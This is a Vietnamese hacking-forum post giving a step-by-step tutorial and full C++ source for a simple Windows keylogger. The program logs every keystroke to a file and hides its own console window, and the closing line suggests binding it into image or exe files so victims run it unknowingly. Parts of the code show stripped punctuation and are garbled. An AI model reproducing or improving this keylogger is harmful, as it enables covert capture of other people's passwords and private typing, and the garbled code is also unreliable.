Hướng dẫn tự coding 1 keyloger đơn giản C++

Discussion in 'C & C++' started by Mickey, Dec 5, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Mình hướng dẫ ở mức độ basic thôi nha, ở đâu code cũng dễ hiểu thôi. Dễ hiểu đối với những bạn đã từng học lập trình, còn ai chưa học thì mình chịu. :beat_brick
  Đầu tiên bạn phải có Dev C++, bạn có thể lên trang chủ nó tải về http://www.bloodshed.net/
  Bước 1 Tạo new Source
  Bước 2 COPY và paste đoạn code này vào
  Mã:

  PHP:
  #include <iostream>
  using namespace std;
  #include <windows.h>
  #include <winuser.h>
  int Save (int key_strokechar *file);
  void Stealth();

  int main()
  {
  Stealth();
  char i;

  while (
  1)
  {
  for(
  8<= 190i++)
  {
  if (
  GetAsyncKeyState(i) == -32767)
  Save (i,"LOG.txt");
  }
  }
  system ("PAUSE");
  return 
  0;
  }

  /* *********************************** */

  int Save (int key_strokechar *file)
  {
  if ( (
  key_stroke == 1) || (key_stroke == 2) )
  return 
  0;

  FILE *OUTPUT_FILE;
  OUTPUT_FILE fopen(file"a+");

  cout << key_stroke << endl;

  if (
  key_stroke == 8)
  fprintf(OUTPUT_FILE"%s""[BACKSPACE]");
  else if (
  key_stroke == 13)
  fprintf(OUTPUT_FILE"%s""\n");
  else if (
  key_stroke == 32)
  fprintf(OUTPUT_FILE"%s"" ");
  else if (
  key_stroke == VK_TAB)
  fprintf(OUTPUT_FILE"%s""[TAB]");
  else if (
  key_stroke == VK_SHIFT)
  fprintf(OUTPUT_FILE"%s""[SHIFT]");
  else if (
  key_stroke == VK_CONTROL)
  fprintf(OUTPUT_FILE"%s""[CONTROL]");
  else if (
  key_stroke == VK_ESCAPE)
  fprintf(OUTPUT_FILE"%s""[ESCAPE]");
  else if (
  key_stroke == VK_END)
  fprintf(OUTPUT_FILE"%s""[END]");
  else if (
  key_stroke == VK_HOME)
  fprintf(OUTPUT_FILE"%s""[HOME]");
  else if (
  key_stroke == VK_LEFT)
  fprintf(OUTPUT_FILE"%s""[LEFT]");
  else if (
  key_stroke == VK_UP)
  fprintf(OUTPUT_FILE"%s""[UP]");
  else if (
  key_stroke == VK_RIGHT)
  fprintf(OUTPUT_FILE"%s""[RIGHT]");
  else if (
  key_stroke == VK_DOWN)
  fprintf(OUTPUT_FILE"%s""[DOWN]");
  else if (
  key_stroke == 190 || key_stroke == 110)
  fprintf(OUTPUT_FILE"%s"".");
  else
  fprintf(OUTPUT_FILE"%s", &key_stroke);

  fclose (OUTPUT_FILE);
  return 
  0;
  }

  /* *********************************** */

  void Stealth()
  {
  HWND Stealth;
  AllocConsole();
  Stealth FindWindowA("ConsoleWindowClass"NULL);
  ShowWindow(Stealth,0);
  }

  Bước 3 Compile the Code(Ctrl+F9)
  Bước 4 Ctrl + F10 để chạy chương trình (Execute->Run)
  Đoạn log được lưu lại file log.txt, các bạn nhìn code sẽ rõ
  Mã:
  Save (i,"LOG.txt");
  Các này có thể gắn vô file ảnh, exe......
   

Share This Page